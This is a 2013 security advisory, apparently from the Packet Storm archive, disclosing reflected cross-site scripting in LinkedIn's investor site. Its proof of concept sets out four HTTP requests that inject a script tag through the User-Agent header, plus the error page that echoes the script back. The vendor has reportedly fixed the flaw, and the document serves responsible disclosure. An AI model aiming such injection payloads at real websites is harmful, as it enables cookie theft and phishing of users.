exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LinkedIn Investors Cross Site Scripting

LinkedIn Investors Cross Site Scripting
Posted Mar 25, 2013
Authored by Eduardo Garcia Melia

The LinkedIn Investors site suffered from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 20cf335eff36b02cd7cdf733bd516815daeadfdbe43552c66b7dc93b741b649a

LinkedIn Investors Cross Site Scripting

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2013-006
- Original release date: 4th March 2013
- Last revised: 25th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 4.3/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
Multiple Reflected XSS vulnerabilities in LinkedIn Investors.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and
website(http://www.linkedin.com/) operates the world's largest
professional network on the Internet with more than 187 million
members in over 200 countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn Investors is affected by Multiple reflected Cross-Site
Scripting vulnerabilities. An attacker can inject HTML or script code
in the context of victim's browser, so can perform XSS attacks, and
steal cookies of a targeted user. The affected resource is
http://investors.linkedin.com.

IV. PROOF OF CONCEPT
-------------------------
The XSS vulnerability its in User-Agent:
===============
First XSS
===============
GET /releasedetail.cfm?ReleaseID=738977' HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Second XSS
===============
GET /eventdetail.cfm?eventid=124442'-- HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Third XSS
===============
GET
/stocklookup.cfm?historic_Month=2&historic_Day=4&historic_Year=2013'--
HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/stocklookup.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

===============
Fourth XSS
===============
GET
/calculator.cfm?PostBack=1&initialAmnt=100&calc_method=shrs&historic_Month=5&historic_Day=19&historic_Year=2011'--&Submit=Calculate
HTTP/1.1
Host: investors.linkedin.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: <script>alert("XSS")</script>
Referer: http://investors.linkedin.com/calculator.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2

RESPONSE in all cases:

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 04 Mar 2013 11:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<h2>Error occurred processing request</h2>

<b>Error Diagnostic</b><p>
<cfoutput>
Element RESULT.TITLE is undefined in RELEASEDETAIL. <br>The error
occurred on line 175.

Date/Time: Mon Mar 04 06:34:48 EST 2013<br>
Browser: <script>alert("XSS")</script><br>
Remote Address: 192.168.149.88<br>
<!--- removed query string from error page - info sec viewed it as
XSS - tws - 05/18/2010 --->
</cfoutput>

V. BUSINESS IMPACT
------------------------
This flaw can be used by a malicious user to send phishing to the
linked in customers, abusing of the users trust on LinkedIn portal,
tricking the user. This user can be forward to a LinkedIn clone site
to stolen credentials, to some malicious site hosting malware and more.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn Investors:
http://investors.linkedin.com

VII. SOLUTION
-------------------------
Corrected by vendor.

VIII. REFERENCES
-------------------------
http://investors.linkedin.com
http://www.isecauditors.com
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 04, 2013: Initial release
March 10, 2013: Second release

XI. DISCLOSURE TIMELINE
-------------------------
March 04, 2013: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 10, 2013: Sent to Sec Team.
March 25, 2013: Request for update. Response regarding
it was already corrected. Sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security
advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close